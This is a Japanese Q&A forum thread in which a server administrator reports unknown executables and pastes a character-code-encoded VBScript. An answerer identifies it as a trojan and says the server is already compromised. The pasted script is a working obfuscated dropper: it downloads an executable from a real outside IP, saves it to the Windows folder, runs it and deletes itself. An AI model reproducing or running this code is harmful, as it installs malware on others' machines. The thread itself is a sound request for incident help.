こんにちはゲストさん。会員登録(無料)して質問・回答してみよう!

解決済みの質問

ウイルスでしょうか

クラウド上のwindows 2012サーバ上のçドライブの配下に見たとこもないexeがたくさんありました。
サーバは私のみが管理しているので外部から侵入しようとしているようにか見えないのですが、
間違いないでしょうか?

・3222222222.exe
・6444444444.exe
・exp.exe
・exp1.exe
・exp2.exe
・ma.exe
・Mmly.exe
・office.exe
・tan.exe
・tan1.exe
・y.exe

他にもbatやvbsも複数みつかり下記のような内容でした。

strs=array(13,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,115,101,116,32,119,115,61,119,115,99,114,105,112,116,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,68,105,109,32,102,115,111,44,102,108,100,13,10,83,101,116,32,102,115,111,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,83,101,116,32,79,112,101,114,97,116,105,111,110,82,101,103,105,115,116,114,121,61,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,83,101,116,32,120,102,117,49,98,49,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,34,38,34,114,111,115,111,102,116,46,88,77,34,38,34,76,34,38,34,72,84,84,80,34,41,32,13,10,119,105,116,104,32,120,102,117,49,98,49,32,13,10,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,49,49,53,46,50,56,46,56,57,46,49,49,54,58,49,53,54,51,47,50,51,50,51,46,101,120,101,34,44,48,32,32,13,10,46,83,101,110,100,40,41,32,13,10,101,110,100,32,119,105,116,104,32,13,10,83,101,116,32,115,122,49,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,34,38,34,79,68,66,46,83,116,34,38,34,114,34,38,34,101,97,109,34,41,32,13,10,119,105,116,104,32,115,122,49,32,32,13,10,46,116,121,112,101,32,61,32,101,118,97,108,40,34,49,34,41,32,13,10,46,77,111,100,101,32,61,32,101,118,97,108,40,34,51,34,41,32,32,13,10,46,111,112,101,110,40,41,32,13,10,46,119,114,105,116,101,32,101,118,97,108,40,34,120,102,117,49,98,49,46,114,101,115,34,38,34,112,111,34,38,34,110,115,101,34,38,34,66,111,100,34,38,34,121,34,41,32,13,10,46,83,97,118,101,84,111,70,105,108,101,32,34,67,58,92,87,73,78,68,79,87,83,92,50,51,50,51,46,101,120,101,34,44,101,118,97,108,32,40,34,50,34,41,32,32,13,10,101,110,100,32,119,105,116,104,13,10,68,105,109,32,111,98,106,49,32,13,10,83,101,116,32,111,98,106,49,61,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,32,13,10,111,98,106,49,46,82,117,110,32,34,67,58,92,87,73,78,68,79,87,83,92,50,51,50,51,46,101,120,101,34,13,10,115,101,116,32,102,115,111,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,32,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,51,48,48,48,13,10,99,114,101,97,116,101,111,98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103,46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99,116,34,41,46,103,101,116,102,105,108,101,40,119,115,99,114,105,112,116,46,115,99,114,105,112,116,102,117,108,108,110,97,109,101,41,46,100,101,108,101,116,101,13,10)
for i=1 to UBound(strs)
runner=runner&chr(strs(i))
next
Execute runner

投稿日時 - 2017-02-14 16:06:37

QNo.9293769

すぐに回答ほしいです

質問者が選んだベストアンサー

>下記のような内容でした。

このvbスクリプトは、当方のパソコンで「Trojan script.212471」と言うウイルスであると判定されました。

>間違いないでしょうか?

間違いです。間違いの内容は「侵入しようとしている、ではなく、既に侵入されてウイルスに感染している」です。

つまり「手遅れの可能性が非常に高い」です。

なお「数字の羅列」は「ウイルスの機械語コードそのもの」であり、そのウイルスをExecuteコマンドで実行する、と言うスクリプトです。

そういうウイルスのスクリプトがディスク上に存在しているのであれば「既に実行されてしまった後」だと考えるべきです。

実行されずにウイルスとして隔離されたのであれば、セキュリティソフトが「実行を阻止した」とか「ウィルスを検知しました」とか、何らかのメッセージを表示している筈です。

それらのメッセージが出ていないのであれば「ウイルスとして検知されずスルーされ、ウイルスが実行され、既に感染状態にある」としか思えません。

投稿日時 - 2017-02-14 17:10:12

このQ&Aは役に立ちましたか?

0人が「このQ&Aが役に立った」と投票しています

回答(1)

あなたにオススメの質問